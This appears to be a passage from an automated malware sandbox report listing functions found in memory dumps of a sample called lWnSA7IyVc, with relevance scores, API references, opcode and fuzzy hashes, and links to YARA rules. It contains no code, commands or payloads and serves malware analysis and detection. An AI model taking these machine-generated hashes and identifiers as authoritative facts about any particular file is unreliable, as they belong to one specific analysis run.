                                                                                                                                                  • Opcode ID: c40a5537cdd04ca9c6139276860315f62b38574eb8bd62d62d7f0474a1153d91
                                                                                                                                                  • Instruction ID: 5874cb0b6f0b221c69480800262299d1835d6188d60d4abb663ecfa173b7aa05
                                                                                                                                                  • Opcode Fuzzy Hash: c40a5537cdd04ca9c6139276860315f62b38574eb8bd62d62d7f0474a1153d91
                                                                                                                                                  • Instruction Fuzzy Hash: F51153B1C002498FCB10CF9AC404ADEFBF4EB88210F50806AD429BB210D774A541CFA4
                                                                                                                                                  Function 06B175EF Relevance: 1.6, APIs: 1, Instructions: 51libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • LoadLibraryW.KERNEL32(00000000,?,?,?,?,00000000,00000E20,?,?,06B174A6), ref: 06B17656
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.1877444107.0000000006B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B10000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_6b10000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                  • Opcode ID: e299f72cf27ddfd376435bb290265251ee9944b0db4bb7deb98f50abece49a2b
                                                                                                                                                  • Instruction ID: 701ce0bca65aded3a7ed78a21e2da8857a1df7d1e766ce7dc827a6f5b75f92f1
                                                                                                                                                  • Opcode Fuzzy Hash: e299f72cf27ddfd376435bb290265251ee9944b0db4bb7deb98f50abece49a2b
                                                                                                                                                  • Instruction Fuzzy Hash: 211134B5C002498FCB10CF9AC844ACEFBF4EF88310F10846AD429A7210C774A545CFA5
                                                                                                                                                  Function 01880CE0 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.1869446238.0000000001880000.00000040.00000800.00020000.00000000.sdmp, Offset: 01880000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_1880000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ConsoleWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2863861424-0
                                                                                                                                                  • Opcode ID: c5c1365abf1f1a747b6a82a17820ccff9728909a8a4799d825346469c7e9ea3c
                                                                                                                                                  • Instruction ID: 5c63059fe7825ff3ff8b9b6860a887caab7b1cd911b000fd4e41b95f01832769
                                                                                                                                                  • Opcode Fuzzy Hash: c5c1365abf1f1a747b6a82a17820ccff9728909a8a4799d825346469c7e9ea3c
                                                                                                                                                  • Instruction Fuzzy Hash: FF1116B19003498FCB24DFAAC4457DEBFF5AB88324F24846AD459A7250C7796544CF94
                                                                                                                                                  Function 01880CE8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.1869446238.0000000001880000.00000040.00000800.00020000.00000000.sdmp, Offset: 01880000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_1880000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ConsoleWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2863861424-0
                                                                                                                                                  • Opcode ID: 041e846aeb15e2c2eaa59d1ef8377cbf20c933be685f5eaedc3c8bd1e479978c
                                                                                                                                                  • Instruction ID: 964d83632c58183e5b7d487763621c73d1338042bf0b3f1e97e3c0ed2f0c517e
                                                                                                                                                  • Opcode Fuzzy Hash: 041e846aeb15e2c2eaa59d1ef8377cbf20c933be685f5eaedc3c8bd1e479978c
                                                                                                                                                  • Instruction Fuzzy Hash: A11106B19002498FDB24DFAAC4457DEFFF4AB48324F208429D559A7250CB79A544CFA5
                                                                                                                                                  Function 06B61550 Relevance: 1.4, Instructions: 1409COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.1877531169.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_6b60000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 93e612c1e3d7b554ab42a1f23304707e87a000bf616f3469283f377362548a63
                                                                                                                                                  • Instruction ID: 89f50c471727dbc641c3fc2e222b4d1190a3457403422fd9480c584deb663711
                                                                                                                                                  • Opcode Fuzzy Hash: 93e612c1e3d7b554ab42a1f23304707e87a000bf616f3469283f377362548a63
                                                                                                                                                  • Instruction Fuzzy Hash: 3FC23C74B402189FCB54DB59CC90EADBBB6FF88704F108099E506AB361DB71AE858F51
                                                                                                                                                  Function 06B6349D Relevance: 1.3, Instructions: 1279COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.1877531169.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_6b60000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 6c5affb3f857a5378699326dbff4b8376e96045b186771cae1278c13d6db74f6
                                                                                                                                                  • Instruction ID: bdbab4e39d6b0f1fd0075833623da45bf6821fb0790efa24a7c80e89a02ff11c
                                                                                                                                                  • Opcode Fuzzy Hash: 6c5affb3f857a5378699326dbff4b8376e96045b186771cae1278c13d6db74f6
                                                                                                                                                  • Instruction Fuzzy Hash: C8A1CFB0B042459FCB449F69C854E6EBBF6EF89310F1094AAE516DB3A1CB35DC05CB61
                                                                                                                                                  Function 06B60048 Relevance: .7, Instructions: 665COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.1877531169.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_6b60000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: f0014049a4280111a82f69ed1c99fd5f24b1cf228899ed243f6fe1024f95901f
                                                                                                                                                  • Instruction ID: 5a91e6d78ad87e9c1d0c92652dd49d4a76b774e9a010a0dfaea80b10cfbb00a8
                                                                                                                                                  • Opcode Fuzzy Hash: f0014049a4280111a82f69ed1c99fd5f24b1cf228899ed243f6fe1024f95901f
                                                                                                                                                  • Instruction Fuzzy Hash: AF425A707406158FCB64AF69D95096EBBF2FB85301B108A5CD5029B3A1CB79EC458BC6
                                                                                                                                                  Function 06B604F4 Relevance: .5, Instructions: 501COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.1877531169.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_6b60000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c12c590e6af361a2622529336c57ca44bd91fb3be372cb1d653ca6118fa0f71d
                                                                                                                                                  • Instruction ID: 2a591a9ee99992d14b1bffdfe76316b0b12e938c90b26cb838cbae2ae55be52b
                                                                                                                                                  • Opcode Fuzzy Hash: c12c590e6af361a2622529336c57ca44bd91fb3be372cb1d653ca6118fa0f71d
                                                                                                                                                  • Instruction Fuzzy Hash: 5D128E70B406198FCB54EF6AD954A6EBBF2FF85300F10895CD5029B3A1CB7AEC458B85
                                                                                                                                                  Function 06B6056A Relevance: .5, Instructions: 466COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.1877531169.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_6b60000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 4767816cbe75dcda37f1b070085abcdac40e1d67c8d138d462585d5fe76b9d18
                                                                                                                                                  • Instruction ID: 50c7bbf47bc58eaee21d4df9b117c343a5d5ae046e1dc040d36689a6448cf745
                                                                                                                                                  • Opcode Fuzzy Hash: 4767816cbe75dcda37f1b070085abcdac40e1d67c8d138d462585d5fe76b9d18
                                                                                                                                                  • Instruction Fuzzy Hash: 2B029F70B402198FCB54EF6AD954A6EBBF2FF85700F108998E5029B3A1CB75EC458BC5
                                                                                                                                                  Function 06B605E0 Relevance: .4, Instructions: 428COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.1877531169.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_6b60000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: dde8ea6a45eb5566080c5c1b577476f91ce6e034ea3ad201bc797830e1433ca9
                                                                                                                                                  • Instruction ID: 71b5d9996d0f9435042f187f11e946213a3b5eb47e50b6457c162a644b258bff
                                                                                                                                                  • Opcode Fuzzy Hash: dde8ea6a45eb5566080c5c1b577476f91ce6e034ea3ad201bc797830e1433ca9
                                                                                                                                                  • Instruction Fuzzy Hash: E1029F70B402198FDB54EF6AD954A6EBBF2FF85700F008599E5029B3A1CB76EC45CB81
                                                                                                                                                  Function 06B60656 Relevance: .4, Instructions: 390COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.1877531169.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_6b60000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: bc1f75e9254f40a68e5d2cacb62cf83632b09f6a4a343fa8a2946ea94cd22e93
                                                                                                                                                  • Instruction ID: 0517f45d3e3aee9a935300328d67fcb289e39ec8952a24414b620f49b03efb23
                                                                                                                                                  • Opcode Fuzzy Hash: bc1f75e9254f40a68e5d2cacb62cf83632b09f6a4a343fa8a2946ea94cd22e93
                                                                                                                                                  • Instruction Fuzzy Hash: 01F18E70B402098FDB54EF6AC954A6EBBF2FF85704F008599E5029B3A5CBB5EC45CB81
                                                                                                                                                  Function 06B606CC Relevance: .4, Instructions: 356COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.1877531169.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_6b60000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 4351f5ac757b6994bf0d0ca5bbb083ce43c2f75e577667043a74b37a54e528d6
                                                                                                                                                  • Instruction ID: 2b19631d064580d9a43d359febfa7266b84c3171f5e8195aa3ec3951f356e38b
                                                                                                                                                  • Opcode Fuzzy Hash: 4351f5ac757b6994bf0d0ca5bbb083ce43c2f75e577667043a74b37a54e528d6
                                                                                                                                                  • Instruction Fuzzy Hash: 0AE18C70B402098FDB54EF6AC954A6E7BF2FF85700F108599E5028B3A5CBB6DC46CB91
                                                                                                                                                  Function 06B60001 Relevance: .3, Instructions: 341COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.1877531169.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_6b60000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 8250ab0b3a9f7d74a60e8fbbd1b46de97f9ca676aa3853f7478ad8090c71663d
                                                                                                                                                  • Instruction ID: f73e07ce8963f4f0cb3262c0020a0b47cb848d67dcd03834093ba58ad04ec4ff
                                                                                                                                                  • Opcode Fuzzy Hash: 8250ab0b3a9f7d74a60e8fbbd1b46de97f9ca676aa3853f7478ad8090c71663d
                                                                                                                                                  • Instruction Fuzzy Hash: 77D1A070B412088FDB459F6AC954A6E7BB2FF89700F04819AE502CF3A6DBB5DC45CB91
                                                                                                                                                  Function 06B60046 Relevance: .3, Instructions: 317COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.1877531169.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_6b60000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 0d722107c0c8837079bccf470f79b2696d6598a3297970928adbff318ee6aedd
                                                                                                                                                  • Instruction ID: db76c0a5388b73e258285696eded572b26cf7fc5b74ab7d58d6ff67f439d0e1f
                                                                                                                                                  • Opcode Fuzzy Hash: 0d722107c0c8837079bccf470f79b2696d6598a3297970928adbff318ee6aedd
                                                                                                                                                  • Instruction Fuzzy Hash: 95C18D70B402089FDB44DF6AC954A6E7BF6FF89700F108199E5028B3A5DBB6DC46CB91
                                                                                                                                                  Function 06B611A8 Relevance: .2, Instructions: 182COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.1877531169.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_6b60000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 81a9a2c034b935b083554bbb6450822e271ae1329b809f677c15617328dc3b59
                                                                                                                                                  • Instruction ID: 2f90a13f633e80b9d9894ea5c46a2accf7eee785bb4b9809cafb6daa31930229
                                                                                                                                                  • Opcode Fuzzy Hash: 81a9a2c034b935b083554bbb6450822e271ae1329b809f677c15617328dc3b59
                                                                                                                                                  • Instruction Fuzzy Hash: CB512771F042058FCB54AFBED84057ABBE6EFC6211B1485BAE815CF210EB35C849D7A1
                                                                                                                                                  Function 06B6338B Relevance: .1, Instructions: 78COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.1877531169.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_6b60000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b80dd6d572aadf3cf81acb5ad30d144b092b7dece3b52515b0dae67ac92751b2
                                                                                                                                                  • Instruction ID: c45b572a0bd2a3bdabe56e38b3e3c63289de1b51aed65ada8d9ae5b2f24db48b
                                                                                                                                                  • Opcode Fuzzy Hash: b80dd6d572aadf3cf81acb5ad30d144b092b7dece3b52515b0dae67ac92751b2
                                                                                                                                                  • Instruction Fuzzy Hash: 5A216B35B50104AFCB54CF69D984EADBBB2EF88714F1190A9F9069F365DA31EC05CB10
                                                                                                                                                  Function 016DD054 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.1869205222.00000000016DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016DD000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_16dd000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 198468e4fedd89d159831875f47bf14b156e86be57d4938267f9f8e1597abb48
                                                                                                                                                  • Instruction ID: 2e2695038af22e622d464fe3aeceb1cf859a38b52ba4622d049fa3646f579a84
                                                                                                                                                  • Opcode Fuzzy Hash: 198468e4fedd89d159831875f47bf14b156e86be57d4938267f9f8e1597abb48
                                                                                                                                                  • Instruction Fuzzy Hash: 46210671900240DFCB15EFA4DDC0B2ABFA5FB88314F24C269EA094B296C336D456CBA1
                                                                                                                                                  Function 016ED474 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.1869241196.00000000016ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 016ED000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_16ed000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c2212b50ed8a1375e4cb5fc3a9df25a65f395591de41a2f76f2ae48f59517877
                                                                                                                                                  • Instruction ID: 4562668bb35a33193c48350e693141e0ab072cf1e3f831599a5312d344bc064c
                                                                                                                                                  • Opcode Fuzzy Hash: c2212b50ed8a1375e4cb5fc3a9df25a65f395591de41a2f76f2ae48f59517877
                                                                                                                                                  • Instruction Fuzzy Hash: 16212971505204DFDB05DF98C9C8B26BBE5FB84318F20C66DD80A4B396C336D446CA62
                                                                                                                                                  Function 016ED2C4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.1869241196.00000000016ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 016ED000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_16ed000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 79b778b4716beadc2c6d98d8ca47b4bfc4760b574c243493055c5d0eebd85c58
                                                                                                                                                  • Instruction ID: d8899a9640dd7817ad1974a08a81044391c3b31c7c1c4cac0aa4cd4a2fd75e67
                                                                                                                                                  • Opcode Fuzzy Hash: 79b778b4716beadc2c6d98d8ca47b4bfc4760b574c243493055c5d0eebd85c58
                                                                                                                                                  • Instruction Fuzzy Hash: 66212375505200EFDB01DF58D988B2ABBA5FB85324F24C669D9494B386C33AD446CAA2
                                                                                                                                                  Function 016DD04F Relevance: .1, Instructions: 58COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.1869205222.00000000016DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016DD000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_16dd000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
                                                                                                                                                  • Instruction ID: 6cca6972e946f56b1079c06a72c3888f46c9d7f7b6738c887b666d1d4e22cc65
                                                                                                                                                  • Opcode Fuzzy Hash: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
                                                                                                                                                  • Instruction Fuzzy Hash: C3219D76904280DFDB16DF54DDC4B16BF72FB88314F24C6A9D9490A296C33AD426CB91
                                                                                                                                                  Function 06B612E8 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.1877531169.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_6b60000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 978f941108ff1bce267fd68a9f78c0b10d15c03a3fabb4a397877d7ae57feab5
                                                                                                                                                  • Instruction ID: 59976c3f4994587a4a7ede1ce7c05563e2e31a9f85cf4c6ffd5284c4a643287f
                                                                                                                                                  • Opcode Fuzzy Hash: 978f941108ff1bce267fd68a9f78c0b10d15c03a3fabb4a397877d7ae57feab5
                                                                                                                                                  • Instruction Fuzzy Hash: 0E014972A2074596CB60BE7F98401AEFBF9EF81212F04917AED5A57610FB34D188C7B1
                                                                                                                                                  Function 016ED46F Relevance: .1, Instructions: 53COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.1869241196.00000000016ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 016ED000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_16ed000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                  • Instruction ID: 3549c07c9adfedd0bcd9a649b5e2251aa88eec0dee23c06792cd96684a93ae38
                                                                                                                                                  • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                  • Instruction Fuzzy Hash: 74119D75504280DFDB06CF54D9C8B15BFB1FB88318F24C6AAD84A4B796C33AD45ACB62
                                                                                                                                                  Function 016ED2BF Relevance: .1, Instructions: 53COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.1869241196.00000000016ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 016ED000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_16ed000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                                                                                  • Instruction ID: 0bca75324d2e91d30259d27145adf739be1bb722b90e1f22fe672782fac7b421
                                                                                                                                                  • Opcode Fuzzy Hash: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                                                                                  • Instruction Fuzzy Hash: 8811B275505280DFDB12CF14D9C4B1AFFA1FB85324F24C6AAD8494B756C33AD44ACBA2
                                                                                                                                                  Function 06B612E0 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.1877531169.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_6b60000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 81e61d12f937bd3bd0489f53b1411c31819d5991e9b4bb34d7edc55d0db65fe4
                                                                                                                                                  • Instruction ID: d1b7409f351a0c4657b7bad5cdb38e59245d2fb698807245473f372012a7a448
                                                                                                                                                  • Opcode Fuzzy Hash: 81e61d12f937bd3bd0489f53b1411c31819d5991e9b4bb34d7edc55d0db65fe4
                                                                                                                                                  • Instruction Fuzzy Hash: F101F772A207099ACB60BE7F9C404AEB7B8EF81211B04527AEC1757600FF34D598C6A2

                                                                                                                                                  Non-executed Functions

                                                                                                                                                  Function 06B60D50 Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.1877531169.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_6b60000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                  • API String ID: 0-3823777903
                                                                                                                                                  • Opcode ID: 6cb1946e8464e9bd5a6bea71bee2e517b974b6637bf2db0ff47b883339e2b3e5
                                                                                                                                                  • Instruction ID: 727f825e5d3f91fe18a4f7a8da33ec11cbe3de5310a41638e58f6eb26371f63b
                                                                                                                                                  • Opcode Fuzzy Hash: 6cb1946e8464e9bd5a6bea71bee2e517b974b6637bf2db0ff47b883339e2b3e5
                                                                                                                                                  • Instruction Fuzzy Hash: BA918170B042458FDB49DB6ACA589AEBBF6FF88300F14849AE405DB365CB39DC45CB91